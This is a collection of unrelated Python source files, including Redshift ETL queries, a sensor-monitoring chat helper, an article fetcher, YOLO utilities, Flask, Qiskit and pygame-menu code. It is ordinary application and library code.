name VARCHAR,
location VARCHAR,
latitude FLOAT,
longitude FLOAT)
""")
time_table_create = ("""CREATE TABLE time(
start_time TIMESTAMP PRIMARY KEY,
hour INTEGER,
day INTEGER,
week INTEGER,
month INTEGER,
year INTEGER,
weekday INTEGER)
""")
# STAGING TABLES
staging_events_copy = ("""copy staging_events from {}
iam_role {}
region 'us-west-2'
JSON {}""").format(config.get('S3','LOG_DATA'),
config.get('IAM_ROLE', 'ARN'),
config.get('S3','LOG_JSONPATH'))
staging_songs_copy = ("""copy staging_songs from {}
iam_role {}
region 'us-west-2'
JSON 'auto'
""").format(config.get('S3','SONG_DATA'),
config.get('IAM_ROLE', 'ARN'))
# FINAL TABLES
songplay_table_insert = ("""INSERT INTO songplays (start_time, user_id, level, song_id, artist_id, session_id, location, user_agent)
SELECT DISTINCT
TIMESTAMP 'epoch' + se.ts/1000 *INTERVAL '1 second' as start_time,
se.user_id,
se.level,
ss.song_id,
ss.artist_id,
se.session_id,
se.location,
se.user_agent
FROM staging_events se, staging_songs ss
WHERE se.page = 'NextSong'
AND se.song_title = ss.title
AND user_id NOT IN (SELECT DISTINCT s.user_id FROM songplays s WHERE s.user_id = user_id
AND s.start_time = start_time AND s.session_id = session_id )
""")
user_table_insert = ("""INSERT INTO users (user_id, first_name, last_name, gender, level)
SELECT DISTINCT
user_id,
first_name,
last_name,
gender,
level
FROM staging_events
WHERE page = 'NextSong'
AND user_id NOT IN (SELECT DISTINCT user_id FROM users)
""")
song_table_insert = ("""INSERT INTO songs (song_id, title, artist_id, year, duration)
SELECT DISTINCT
song_id,
title,
artist_id,
year,
duration
FROM staging_songs
WHERE song_id NOT IN (SELECT DISTINCT song_id FROM songs)
""")
artist_table_insert = ("""INSERT INTO artists (artist_id, name, location, latitude, longitude)
SELECT DISTINCT
artist_id,
name,
location,
latitude,
longitude
FROM staging_songs
WHERE artist_id NOT IN (SELECT DISTINCT artist_id FROM artists)
""")
time_table_insert = ("""INSERT INTO time (start_time, hour, day, week, month, year, weekday)
SELECT
start_time,
EXTRACT(hr from start_time) AS hour,
EXTRACT(d from start_time) AS day,
EXTRACT(w from start_time) AS week,
EXTRACT(mon from start_time) AS month,
EXTRACT(yr from start_time) AS year,
EXTRACT(weekday from start_time) AS weekday
FROM (
SELECT DISTINCT TIMESTAMP 'epoch' + se.ts/1000 *INTERVAL '1 second' as start_time
FROM staging_events se
)
WHERE start_time NOT IN (SELECT DISTINCT start_time FROM time)
""")
# QUERY LISTS
create_table_queries = [staging_events_table_create, staging_songs_table_create, user_table_create, song_table_create, artist_table_create, time_table_create, songplay_table_create]
drop_table_queries = [staging_events_table_drop, staging_songs_table_drop, songplay_table_drop, user_table_drop, song_table_drop, artist_table_drop, time_table_drop]
copy_table_queries = [staging_events_copy, staging_songs_copy]
insert_table_queries = [songplay_table_insert, user_table_insert, song_table_insert, artist_table_insert, time_table_insert]
|
"""Example of using hangups to receive chat messages.
Uses the high-level hangups API.
"""
import re
from datetime import datetime as dt
from datetime import timedelta as td
import volatile.memory as mem
import dynadb.db as db
def check_site_sensor(site_code):
""" Returns names of sensors (rain, tilt, soms, piezo) in site."""
df_sites = mem.get("df_sites")
message = ""
try:
site_id = df_sites.site_id[df_sites.site_code == site_code.lower()].values[0]
query_loggers = ("SELECT * FROM (Select logger_name, model_id from commons_db.loggers "
"where site_id = {} and date_deactivated is NULL and logger_id not in (141)) as l "
"inner join commons_db.logger_models "
"on logger_models.model_id = l.model_id".format(site_id))
site_loggers = db.df_read(query_loggers,connection="common")
for i in site_loggers.index:
#if has rain
if site_loggers.has_rain[i] == 1:
table_name = "rain_{}".format(site_loggers.logger_name[i])
add_mes = check_sensor_data(table_name)
message += add_mes
#if has tilt
if site_loggers.has_tilt[i] == 1 and site_loggers.logger_type[i]!="gateway":
table_name = "tilt_{}".format(site_loggers.logger_name[i])
add_mes = check_sensor_data(table_name)
message += add_mes
#if has soms
if site_loggers.has_soms[i] == 1 and site_loggers.logger_type[i]!="gateway":
table_name = "soms_{}".format(site_loggers.logger_name[i])
add_mes = check_sensor_data(table_name)
message += add_mes
#if has piezo
if site_loggers.has_piezo[i] == 1 and site_loggers.logger_type[i]!="gateway":
table_name = "piezo_{}".format(site_loggers.logger_name[i])
add_mes = check_sensor_data(table_name)
message += add_mes
message = message[:-1]
except:
message = "error site_code: {}".format(site_code)
return message
def check_sensor_data(table_name = '', data = False):
""" Returns data presence of sensor (format: rain_xxxxx, tilt_xxxxx)."""
list_mes = ""
try:
if re.search("rain",table_name) or re.search("piezo",table_name):
query_table = ("SELECT * FROM {} "
"where ts <= NOW() order by ts desc limit 1 ".format(table_name))
else:
query_table = ("SELECT ts, node_id, type_num FROM {} "
"where ts > (SELECT ts FROM {} where ts <= NOW() order by ts desc limit 1) "
"- interval 30 minute and ts<=NOW() ".format(table_name,table_name))
last_data = db.df_read(query_table, connection= "analysis")
latest_ts = last_data.ts.max()
if dt.now()-latest_ts <= td(minutes = 30):
list_mes += "{}: MERON ngayon\n".format(table_name)
else:
list_mes += "{}: WALA ngayon\n".format(table_name)
if data:
list_mes += "latest ts: {}\n".format(latest_ts)
if re.search("rain",table_name):
list_mes += "rain = {}mm\n".format(last_data.rain[0])
list_mes += "batt1 = {}\n".format(last_data.battery1[0])
list_mes += "batt2 = {}\n".format(last_data.battery2[0])
elif re.search("piezo",table_name):
print ("piezo")
else:
#for v2 and up
if len(table_name)>9:
num_nodes = last_data.groupby('type_num').size().rename('num').reset_index()
for msgid,n_nodes in zip(num_nodes.type_num,num_nodes.num):
list_mes += "msgid = {} ; # of nodes = {}\n".format(msgid,n_nodes)
#for v1
else:
n_nodes = last_data.node_id.count()
list_mes += "# of nodes = {}".format(n_nodes)
except:
list_mes = "error table: {}\n".format(table_name)
if data:
list_mes += "format: tilt_xxxxx, rain_xxxxx, etc"
return list_mes
def check_logger_number(received_msg):
""" Returns which logger uses the given number."""
numbers = re.findall(r"\d+", received_msg)
numbers = list(map(int,numbers))
message = ""
for num in numbers:
query_num = ("SELECT logger_name FROM logger_mobile "
"inner join commons_db.loggers "
"on logger_mobile.logger_id = loggers.logger_id "
"where loggers.date_deactivated is null "
"and logger_mobile.date_deactivated is null "
"and sim_num like '%%{}'".format(num))
try:
logger_name = db.read(query_num, resource= "sms_data")[0][0]
message += "{} : {}\n".format(num, logger_name)
except IndexError:
message += "{} : not a logger\n".format(num)
return message
def get_server_number():
""" Returns list of server numbers (MIA, gsm, CT phone)."""
server_num = mem.get('df_gsm_modules')
globe_MIA = server_num.loc[server_num.gsm_name == 'globe', 'gsm_sim_num'].values[0]
smart_MIA = server_num.loc[server_num.gsm_name == 'smart', 'gsm_sim_num'].values[0]
message = "Server number for MIA:\nGlobe: {}\nSmart: {}\n".format(globe_MIA, smart_MIA)
globe_logger = server_num.loc[server_num.gsm_name.isin(['globe1', 'globe2']), 'gsm_sim_num'].values
smart_logger = server_num.loc[server_num.gsm_name.isin(['smart1', 'smart2']), 'gsm_sim_num'].values
message += "\nServer number for LOGGERS:\nGlobe:\n{}\nSmart:\n{}\n".format('\n'.join(globe_logger), '\n'.join(smart_logger))
globe_gsm = server_num.loc[server_num.gsm_name.str.contains('globe'), 'gsm_id']
smart_gsm = server_num.loc[server_num.gsm_name.str.contains('smart'), 'gsm_id']
query = ("SELECT sim_num, gsm_id FROM mobile_numbers "
"INNER JOIN user_mobiles "
"USING (mobile_id) "
"INNER JOIN commons_db.users "
"USING (user_id) "
"WHERE nickname = 'CT Phone'")
ct_phone = db.df_read(query, resource= "sms_data")
message += "\nCT Phone:\nGlobe: {}\nSmart: {}".format(ct_phone.loc[ct_phone.gsm_id.isin(globe_gsm), 'sim_num'].values[0], ct_phone.loc[ct_phone.gsm_id.isin(smart_gsm), 'sim_num'].values[0])
return message
def get_number(received_msg):
""" Returns which logger or user the given number is registered to."""
query_loggers = "select logger_name from loggers where date_deactivated is NULL"
loggers = db.df_read(query_loggers, resource= "common_data").logger_name.to_numpy()
query_users = ("SELECT nickname FROM users where nickname is not NULL "
"and nickname !='' and status = 1 ")
users = db.df_read(query_users, resource= "common_data").nickname.str.lower().to_numpy()
message = ""
check_logger = re.findall(r" (?=("+'|'.join(loggers)+r"))", received_msg.lower())
check_user = re.findall(r" (?=("+'|'.join(users)+r"))", received_msg.lower())
if check_logger:
for logger_name in check_logger:
query_num = ("SELECT sim_num FROM logger_mobile "
"inner join commons_db.loggers "
"on logger_mobile.logger_id = loggers.logger_id "
"where logger_name = '{}'".format(logger_name))
logger_num = db.read(query_num, resource= "sms_data")[0][0]
message += "{} : {}\n".format(logger_name, logger_num)
if check_user:
for nickname in check_user:
query_num = ("SELECT nickname, sim_num FROM commons_db.users "
"LEFT JOIN user_mobiles USING (user_id) "
"LEFT JOIN mobile_numbers USING (mobile_id) "
"WHERE nickname IS NOT NULL AND nickname !='' "
"AND users.status = 1 "
"AND nickname LIKE '%%{}%%'".format(nickname))
user_num = db.df_read(query_num, resource= "sms_data")
user_num = user_num.fillna('')
for nickname in set(user_num.nickname):
curr_num = ', '.join(user_num.loc[user_num.nickname == nickname, 'sim_num'].values)
if len(curr_num) != 0:
message += "{} : {}\n".format(nickname, curr_num)
else:
message += "{} : no number\n".format(nickname)
if not check_user and not check_logger:
message += "error: not a logger nor a user\n"
return message
def check_node(received_msg):
""" Returns n_id of the given tsm sensor."""
query_loggers = "select tsm_name from tsm_sensors where date_deactivated is NULL"
sensors = db.df_read(query_loggers, resource= "sensor_data").tsm_name.to_numpy()
check_tsm = re.findall(r" (?=("+'|'.join(sensors)+r"))", received_msg.lower())
message =""
for tsm_name in check_tsm:
try:
query_node = ("SELECT n_id FROM deployed_node "
"inner join tsm_sensors "
"on tsm_sensors.tsm_id = deployed_node.tsm_id "
"where tsm_name = '{}' order by node_id".format(tsm_name))
nodes = db.df_read(query_node, resource= "sensor_data").n_id
message += "{} : ".format(tsm_name)
for nid in nodes:
message+="{},".format(nid)
message = message[:-1]
message +="\n"
except:
message += "no data for {}\n".format(tsm_name)
return message |
from io import BytesIO
from urllib.parse import urlparse
import logging
import requests
from lxml import etree
from readability import Document
from kermes_infra.messages import AddArticleMessage, ArticleFetchCompleteMessage
from kermes_infra.models import Article, RelatedContent
from kermes_infra.queues import SQSProducer
from kermes_infra.repositories import ArticleRepository, FileRepository, UserRepository
class Fetcher:
def __init__(
self,
user_repository: UserRepository,
article_repository: ArticleRepository,
file_repository: FileRepository,
finished_queue_producer: SQSProducer,
logger: logging.Logger,
) -> None:
self.user_repository = user_repository
self.article_repository = article_repository
self.file_repository = file_repository
self.finished_queue_producer = finished_queue_producer
self.logger = logger
@classmethod
def get_filename_from_url(cls, url: str) -> str:
parsed_url = urlparse(url)
return parsed_url.path.rpartition("/")[-1]
def process_message(self, message_json: str) -> bool:
self.logger.debug(f"processing message {message_json}")
# parse the JSON SQS message
add_article_msg = AddArticleMessage.from_json(message_json)
try:
# fetch the content from the URL in the message
resp = requests.get(add_article_msg.url)
except Exception:
self.logger.exception(f"failed to fetch article at url {add_article_msg.url}")
return False
self.logger.debug("simplifying content")
readable_content = Document(resp.text)
parser = etree.HTMLParser()
content_dom = etree.fromstring(readable_content.summary(), parser)
# create an Article model
article = Article(add_article_msg.user_id)
article.url = resp.url
# extract the title from the content
self.logger.debug("extracting article title")
article.title = readable_content.title()
# extract the images from the content
self.logger.debug("fetching related content")
for image in content_dom.iter("img"):
img_url = image.get("src")
try:
# fetch the image by the URL
self.logger.debug(f"fetching related image at {img_url}")
img_resp = requests.get(img_url)
img_key = f"{article.user_id}/articles/{article.article_id}/related/{Fetcher.get_filename_from_url(img_resp.url)}"
except Exception:
self.logger.exception(f"failed to fetch related image at url {img_url}")
continue
# save the images to S3
self.logger.debug(f"writing image {img_url} to S3 with key {img_key}")
if not self.file_repository.put(img_key, BytesIO(resp.content)):
continue
# create RelatedContent models for each image and add to the Article
article.related_content.append(RelatedContent(resp.headers["Content-Type"], img_key))
# re-write the content HTML to point to the new image URL
self.logger.debug(f"re-writing img element with new URL {img_key}")
image.set("src", img_key)
# write the content to S3
content_key = f"{article.user_id}/articles/{article.article_id}/content.html"
self.logger.debug(f"writing content to S# with key {content_key}")
if not self.file_repository.put(
content_key, BytesIO(etree.tostring(content_dom.getroottree(), pretty_print=True, method="html"))
):
return False
# update the Article with the content key
article.content_key = content_key
# write the Article to Dynamo
self.logger.debug(
f"writing article to debug with keys user_id {article.user_id} article_id {article.article_id}"
)
if not self.article_repository.put(article):
return False
# send a completed message to SQS
self.logger.debug("writing completed message to SQS")
if not self.finished_queue_producer.send_message(
ArticleFetchCompleteMessage(article.user_id, article.article_id).to_json()
):
return False
return True
|
import math
import numpy as np
import cv2
import random
import colorsys
coco = ['person', 'bicycle', 'car', 'motorcycle', 'airplane', 'bus', 'train', 'truck', 'boat', 'traffic light',
'fire hydrant', 'stop sign', 'parking meter', 'bench', 'bird', 'cat', 'dog', 'horse', 'sheep', 'cow',
'elephant', 'bear', 'zebra', 'giraffe', 'backpack', 'umbrella', 'handbag', 'tie', 'suitcase', 'frisbee',
'skis', 'snowboard', 'sports ball', 'kite', 'baseball bat', 'baseball glove', 'skateboard', 'surfboard',
'tennis racket', 'bottle', 'wine glass', 'cup', 'fork', 'knife', 'spoon', 'bowl', 'banana', 'apple',
'sandwich', 'orange', 'broccoli', 'carrot', 'hot dog', 'pizza', 'donut', 'cake', 'chair', 'couch',
'potted plant', 'bed', 'dining table', 'toilet', 'tv', 'laptop', 'mouse', 'remote', 'keyboard', 'cell phone',
'microwave', 'oven', 'toaster', 'sink', 'refrigerator', 'book', 'clock', 'vase', 'scissors', 'teddy bear',
'hair drier', 'toothbrush']
def gen_colors(classes):
"""
generate unique hues for each class and convert to bgr
classes -- list -- class names (80 for coco dataset)
-> list
"""
hsvs = []
for x in range(len(classes)):
hsvs.append([float(x) / len(classes), 1., 0.7])
random.seed(1234)
random.shuffle(hsvs)
rgbs = []
for hsv in hsvs:
h, s, v = hsv
rgb = colorsys.hsv_to_rgb(h, s, v)
rgbs.append(rgb)
bgrs = []
for rgb in rgbs:
bgr = (int(rgb[2] * 255), int(rgb[1] * 255), int(rgb[0] * 255))
bgrs.append(bgr)
return bgrs
color_list = gen_colors(coco)
def sigmoid(x):
return 1 / (1 + math.exp(-x))
def sigmoid_v(array):
return np.reciprocal(np.exp(-array) + 1.0)
def make_grid(nx, ny):
"""
Create scaling tensor based on box location
Source: https://github.com/ultralytics/yolov5/blob/master/models/yolo.py
Arguments
nx: x-axis num boxes
ny: y-axis num boxes
Returns
grid: tensor of shape (1, 1, nx, ny, 80)
"""
nx_vec = np.arange(nx)
ny_vec = np.arange(ny)
yv, xv = np.meshgrid(ny_vec, nx_vec)
grid = np.stack((yv, xv), axis=2)
grid = grid.reshape(1, 1, ny, nx, 2)
return grid
def xywh2xyxy(x, origin_w=0, origin_h=0, INPUT_W=640, INPUT_H=640):
"""
description: Convert nx4 boxes from [x, y, w, h] to [x1, y1, x2, y2] where xy1=top-left, xy2=bottom-right
param:
origin_h: height of original image
origin_w: width of original image
x: A boxes tensor, each row is a box [center_x, center_y, w, h]
return:
y: A boxes tensor, each row is a box [x1, y1, x2, y2]
"""
y = np.zeros_like(x)
r_w = INPUT_W / origin_w
r_h = INPUT_H / origin_h
if r_h > r_w:
y[:, 0] = x[:, 0] - x[:, 2] / 2
y[:, 2] = x[:, 0] + x[:, 2] / 2
y[:, 1] = x[:, 1] - x[:, 3] / 2 - (INPUT_H - r_w * origin_h) / 2
y[:, 3] = x[:, 1] + x[:, 3] / 2 - (INPUT_H - r_w * origin_h) / 2
y /= r_w
else:
y[:, 0] = x[:, 0] - x[:, 2] / 2 - (INPUT_W - r_h * origin_w) / 2
y[:, 2] = x[:, 0] + x[:, 2] / 2 - (INPUT_W - r_h * origin_w) / 2
y[:, 1] = x[:, 1] - x[:, 3] / 2
y[:, 3] = x[:, 1] + x[:, 3] / 2
y /= r_h
return y
def non_max_suppression(boxes, confs, classes, iou_thres=0.6):
x1 = boxes[:, 0]
y1 = boxes[:, 1]
x2 = boxes[:, 2]
y2 = boxes[:, 3]
areas = (x2 - x1 + 1) * (y2 - y1 + 1)
order = confs.flatten().argsort()[::-1]
keep = []
while order.size > 0:
i = order[0]
keep.append(i)
xx1 = np.maximum(x1[i], x1[order[1:]])
yy1 = np.maximum(y1[i], y1[order[1:]])
xx2 = np.minimum(x2[i], x2[order[1:]])
yy2 = np.minimum(y2[i], y2[order[1:]])
w = np.maximum(0.0, xx2 - xx1 + 1)
h = np.maximum(0.0, yy2 - yy1 + 1)
inter = w * h
ovr = inter / (areas[i] + areas[order[1:]] - inter)
inds = np.where(ovr <= iou_thres)[0]
order = order[inds + 1]
boxes = boxes[keep]
confs = confs[keep]
classes = classes[keep]
return boxes, confs, classes
def nms(pred, iou_thres=0.6, origin_w=0, origin_h=0):
boxes = xywh2xyxy(pred[..., 0:4], origin_w, origin_h)
# best class only
confs = np.amax(pred[:, 5:], 1, keepdims=True)
classes = np.argmax(pred[:, 5:], axis=-1)
return non_max_suppression(boxes, confs, classes, iou_thres)
def letterbox(img, new_shape=(640, 640), color=(114, 114, 114), auto=True, scaleFill=False, scaleup=True):
# Resize image to a 32-pixel-multiple rectangle https://github.com/ultralytics/yolov3/issues/232
shape = img.shape[:2] # current shape [height, width]
if isinstance(new_shape, int):
new_shape = (new_shape, new_shape)
# Scale ratio (new / old)
r = min(new_shape[0] / shape[0], new_shape[1] / shape[1])
if not scaleup: # only scale down, do not scale up (for better test mAP)
r = min(r, 1.0)
# Compute padding
ratio = r, r # width, height ratios
new_unpad = int(round(shape[1] * r)), int(round(shape[0] * r))
dw, dh = new_shape[1] - new_unpad[0], new_shape[0] - new_unpad[1] # wh padding
if auto: # minimum rectangle
dw, dh = np.mod(dw, 32), np.mod(dh, 32) # wh padding
elif scaleFill: # stretch
dw, dh = 0.0, 0.0
new_unpad = (new_shape[1], new_shape[0])
ratio = new_shape[1] / shape[1], new_shape[0] / shape[0] # width, height ratios
dw /= 2 # divide padding into 2 sides
dh /= 2
if shape[::-1] != new_unpad: # resize
img = cv2.resize(img, new_unpad, interpolation=cv2.INTER_LINEAR)
top, bottom = int(round(dh - 0.1)), int(round(dh + 0.1))
left, right = int(round(dw - 0.1)), int(round(dw + 0.1))
img = cv2.copyMakeBorder(img, top, bottom, left, right, cv2.BORDER_CONSTANT, value=color) # add border
return img
def GiB(val):
return val * 1 << 30
def draw_results(img, boxes, confs, classes):
window_name = 'final results'
cv2.namedWindow(window_name)
overlay = img.copy()
final = img.copy()
for box, conf, cls in zip(boxes, confs, classes):
# draw rectangle
x1, y1, x2, y2 = box
conf = conf[0]
cls_name = coco[cls]
color = color_list[cls]
cv2.rectangle(overlay, (x1, y1), (x2, y2), color, thickness=1, lineType=cv2.LINE_AA)
# draw text
cv2.putText(overlay, '%s %f' % (cls_name, conf), org=(x1, int(y1-10)), fontFace=cv2.FONT_HERSHEY_SIMPLEX, fontScale=0.5, color=color)
# cv2.addWeighted(overlay, 0.5, final, 1 - 0.5, 0, final)
cv2.imshow(window_name, overlay)
cv2.waitKey(0) |
import mysql.connector
import tkinter as tk
from mysql.connector import Error
from tkinter import *
from _curses import COLOR_BLACK
class loginFrame(tk.Frame):
global connection
# global password
# frame.bg = COLOR_BLACK
def __init__(self, parent, controller):
tk.Frame.__init__(self, parent)
self.controller = controller
# super(loginFrame, self).__init__()
self.password = Entry(self)
# frame = tk.Frame(root, bg="black")
self.place(relwidth=0.8, relheight=0.8, relx=0.1, rely=0.1)
self.password.grid(row=0, column=1, pady=10)
self.password.config(show='*')
password_label = Label(self, text="Enter MySQL Password: ")
password_label.grid(row=0, column=0)
password_button = Button(self, text="Submit Password", command=self.create_connection)
password_button.grid(row=2, column=0, columnspan=2)
# def printer(self):
# print("{} {}".format(self.i, self.j))
def create_connection(self):
global connection
connection = None
try:
connection = mysql.connector.connect(
host="localhost",
user="root",
passwd=self.password.get(),
database="breathofthemild"
)
output_msg = "Connection to MySQL DB successful"
print(connection)
self.controller.set_connection(connection)
self.controller.show_frame("DatabaseSelectionFrame")
except Error as e:
print(f"The error '{e}' occurred")
# menu_options = ["Insert", "Update", "Delete", "Display"]
# selected = StringVar(frame)
# selected.set(menu_options[0])
# menu = OptionMenu(frame, selected, *menu_options, command=done)
# menu.grid(row=0, column=0, pady=10)
def execute_read_query(connection, query):
cursor = connection.cursor()
result = None
try:
cursor.execute(query)
result = cursor.fetchall()
return result
except Error as e:
print(f"The error '{e}' occurred")
def get_frame(self):
return self.frame
def done(selected):
print("Yay!")
# x = loginFrame()
# x.printer() |
'''This file is a test file of a 3-body simulation. It takes input from a binary data file and plots the positions of two satellites around the Earth.
'''
import matplotlib.pyplot as plt
import numpy as np
import Simulation
#Load in the data file
Data = np.load("ThreeBodyTest.npy", allow_pickle=True)
earth_x = [items[1].position[0] for items in Data]
earth_y = [items[1].position[1] for items in Data]
earth_z = [items[1].position[2] for items in Data]
satellite_1_x = [items[2].position[0] for items in Data]
satellite_1_y = [items[2].position[1] for items in Data]
satellite_1_z = [items[2].position[2] for items in Data]
satellite_2_x = [items[3].position[0] for items in Data]
satellite_2_y = [items[3].position[1] for items in Data]
satellite_2_z = [items[3].position[2] for items in Data]
#Plot the orbits
plt.plot(satellite_1_x, satellite_1_y, label="Satellite 1")
plt.plot(satellite_2_x, satellite_2_y, label="Satellite 2")
plt.plot(earth_x, earth_y, marker='.', label="Earth")
plt.legend()
plt.savefig('plots/Solar_System_1.pdf')
plt.show()
|
import os
from flask import Flask
import blinker as _
from ddtrace import tracer
from ddtrace.contrib.flask import TraceMiddleware
import logging
import sys
# Have flask use stdout as the logger
main_logger = logging.getLogger()
main_logger.setLevel(logging.DEBUG)
c = logging.StreamHandler(sys.stdout)
formatter = logging.Formatter('%(asctime)s - %(name)s - %(levelname)s - %(message)s')
c.setFormatter(formatter)
main_logger.addHandler(c)
tracer.configure(
hostname=os.environ['DD_AGENT_SERVICE_HOST'],
port=os.environ['DD_AGENT_SERVICE_PORT'],
)
app = Flask(__name__)
traced_app = TraceMiddleware(app, tracer, service="my-flask-app", distributed_tracing=False)
@app.route('/')
def hello_world():
return 'Flask Dockerized'
if __name__ == '__main__':
app.run(debug=True,host='0.0.0.0')
|
# This code is part of Qiskit.
#
# (C) Copyright IBM 2017, 2019, 2021.
#
# This code is licensed under the Apache License, Version 2.0. You may
# obtain a copy of this license in the LICENSE.txt file in the root directory
# of this source tree or at http://www.apache.org/licenses/LICENSE-2.0.
#
# Any modifications or derivative works of this code must retain this
# copyright notice, and modified files need to carry a notice indicating
# that they have been altered from the originals.
"""Objects to represent the information at a node in the DAGCircuit."""
import warnings
from typing import Iterable
from qiskit.circuit import Qubit, Clbit
def _condition_as_indices(operation, bit_indices):
cond = getattr(operation, "condition", None)
if cond is None:
return None
bits, value = cond
indices = [bit_indices[bits]] if isinstance(bits, Clbit) else [bit_indices[x] for x in bits]
return indices, value
class DAGNode:
"""Parent class for DAGOpNode, DAGInNode, and DAGOutNode."""
__slots__ = ["_node_id"]
def __init__(self, nid=-1):
"""Create a node"""
self._node_id = nid
def __lt__(self, other):
return self._node_id < other._node_id
def __gt__(self, other):
return self._node_id > other._node_id
def __str__(self):
# TODO is this used anywhere other than in DAG drawing?
# needs to be unique as it is what pydot uses to distinguish nodes
return str(id(self))
@staticmethod
def semantic_eq(node1, node2, bit_indices1=None, bit_indices2=None):
"""
Check if DAG nodes are considered equivalent, e.g., as a node_match for nx.is_isomorphic.
Args:
node1 (DAGOpNode, DAGInNode, DAGOutNode): A node to compare.
node2 (DAGOpNode, DAGInNode, DAGOutNode): The other node to compare.
bit_indices1 (dict): Dictionary mapping Bit instances to their index
within the circuit containing node1
bit_indices2 (dict): Dictionary mapping Bit instances to their index
within the circuit containing node2
Return:
Bool: If node1 == node2
"""
if bit_indices1 is None or bit_indices2 is None:
warnings.warn(
"DAGNode.semantic_eq now expects two bit-to-circuit index "
"mappings as arguments. To ease the transition, these will be "
"pre-populated based on the values found in Bit.index and "
"Bit.register. However, this behavior is deprecated and a future "
"release will require the mappings to be provided as arguments.",
DeprecationWarning,
)
bit_indices1 = {arg: arg for arg in node1.qargs + node1.cargs}
bit_indices2 = {arg: arg for arg in node2.qargs + node2.cargs}
if isinstance(node1, DAGOpNode) and isinstance(node2, DAGOpNode):
node1_qargs = [bit_indices1[qarg] for qarg in node1.qargs]
node1_cargs = [bit_indices1[carg] for carg in node1.cargs]
node2_qargs = [bit_indices2[qarg] for qarg in node2.qargs]
node2_cargs = [bit_indices2[carg] for carg in node2.cargs]
# For barriers, qarg order is not significant so compare as sets
if node1.op.name == node2.op.name and node1.name in {"barrier", "swap"}:
return set(node1_qargs) == set(node2_qargs)
return (
node1_qargs == node2_qargs
and node1_cargs == node2_cargs
and (
_condition_as_indices(node1.op, bit_indices1)
== _condition_as_indices(node2.op, bit_indices2)
)
and node1.op == node2.op
)
if (isinstance(node1, DAGInNode) and isinstance(node2, DAGInNode)) or (
isinstance(node1, DAGOutNode) and isinstance(node2, DAGOutNode)
):
return bit_indices1.get(node1.wire, None) == bit_indices2.get(node2.wire, None)
return False
class DAGOpNode(DAGNode):
"""Object to represent an Instruction at a node in the DAGCircuit."""
__slots__ = ["op", "qargs", "cargs", "sort_key"]
def __init__(self, op, qargs: Iterable[Qubit] = (), cargs: Iterable[Clbit] = ()):
"""Create an Instruction node"""
super().__init__()
self.op = op
self.qargs = tuple(qargs)
self.cargs = tuple(cargs)
self.sort_key = str(self.qargs)
@property
def name(self):
"""Returns the Instruction name corresponding to the op for this node"""
return self.op.name
@name.setter
def name(self, new_name):
"""Sets the Instruction name corresponding to the op for this node"""
self.op.name = new_name
def __repr__(self):
"""Returns a representation of the DAGOpNode"""
return f"DAGOpNode(op={self.op}, qargs={self.qargs}, cargs={self.cargs})"
class DAGInNode(DAGNode):
"""Object to represent an incoming wire node in the DAGCircuit."""
__slots__ = ["wire", "sort_key"]
def __init__(self, wire):
"""Create an incoming node"""
super().__init__()
self.wire = wire
# TODO sort_key which is used in dagcircuit.topological_nodes
# only works as str([]) for DAGInNodes. Need to figure out why.
self.sort_key = str([])
def __repr__(self):
"""Returns a representation of the DAGInNode"""
return f"DAGInNode(wire={self.wire})"
class DAGOutNode(DAGNode):
"""Object to represent an outgoing wire node in the DAGCircuit."""
__slots__ = ["wire", "sort_key"]
def __init__(self, wire):
"""Create an outgoing node"""
super().__init__()
self.wire = wire
# TODO sort_key which is used in dagcircuit.topological_nodes
# only works as str([]) for DAGOutNodes. Need to figure out why.
self.sort_key = str([])
def __repr__(self):
"""Returns a representation of the DAGOutNode"""
return f"DAGOutNode(wire={self.wire})"
|
# coding=utf-8
"""
pygame-menu
https://github.com/ppizarror/pygame-menu
SCROLLAREA
ScrollArea class to manage scrolling in menu.
License:
-------------------------------------------------------------------------------
The MIT License (MIT)
Copyright 2017-2020 Pablo Pizarro R. @ppizarror
Permission is hereby granted, free of charge, to any person obtaining a
copy of this software and associated documentation files (the "Software"),
to deal in the Software without restriction, including without limitation
the rights to use, copy, modify, merge, publish, distribute, sublicense,
and/or sell copies of the Software, and to permit persons to whom the Software
is furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY,
WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
-------------------------------------------------------------------------------
"""
import pygame
import pygame_menu.baseimage as _baseimage
import pygame_menu.locals as _locals
from pygame_menu.utils import make_surface, assert_color, assert_position
from pygame_menu.widgets import ScrollBar
class ScrollArea(object):
"""
The ScrollArea class provides a scrolling view managing up to 4 scroll bars.
A scroll area is used to display the contents of a child surface (``world``).
If the surface exceeds the size of the drawing surface, the view provide
scroll bars so that the entire area of the child surface can be viewed.
:param area_width: Width of scrollable area (px)
:type area_width: int, float
:param area_height: Height of scrollable area (px)
:type area_height: int, float
:param area_color: Background color, it can be a color or an image
:type area_color: tuple, list, :py:class:`pygame_menu.baseimage.BaseImage`, None
:param extend_x: Px to extend the surface in yxaxis (px) from left
:type extend_x: int, float
:param extend_y: Px to extend the surface in y axis (px) from top
:type extend_y: int, float
:param scrollbar_color: Scrollbars color
:type scrollbar_color: tuple, list
:param scrollbar_slider_color: Color of the sliders
:type scrollbar_slider_color: tuple, list
:param scrollbar_slider_pad: Space between slider and scrollbars borders
:type scrollbar_slider_pad: int, float
:param scrollbar_thick: Scrollbars thickness
:type scrollbar_thick: int, float
:param scrollbars: Positions of the scrollbars
:type scrollbars: tuple, list
:param shadow: Indicate if a shadow is drawn on each scrollbar
:type shadow: bool
:param shadow_color: Color of the shadow
:type shadow_color: tuple, list
:param shadow_offset: Offset of shadow
:type shadow_offset: int, float
:param shadow_position: Position of shadow
:type shadow_position: str
:param world: Surface to draw and scroll
:type world: :py:class:`pygame.Surface`, None
"""
def __init__(self,
area_width,
area_height,
area_color=None,
extend_x=0,
extend_y=0,
scrollbar_color=(235, 235, 235),
scrollbar_slider_color=(200, 200, 200),
scrollbar_slider_pad=0,
scrollbar_thick=20,
scrollbars=(_locals.POSITION_SOUTH, _locals.POSITION_EAST),
shadow=False,
shadow_color=(0, 0, 0),
shadow_offset=2,
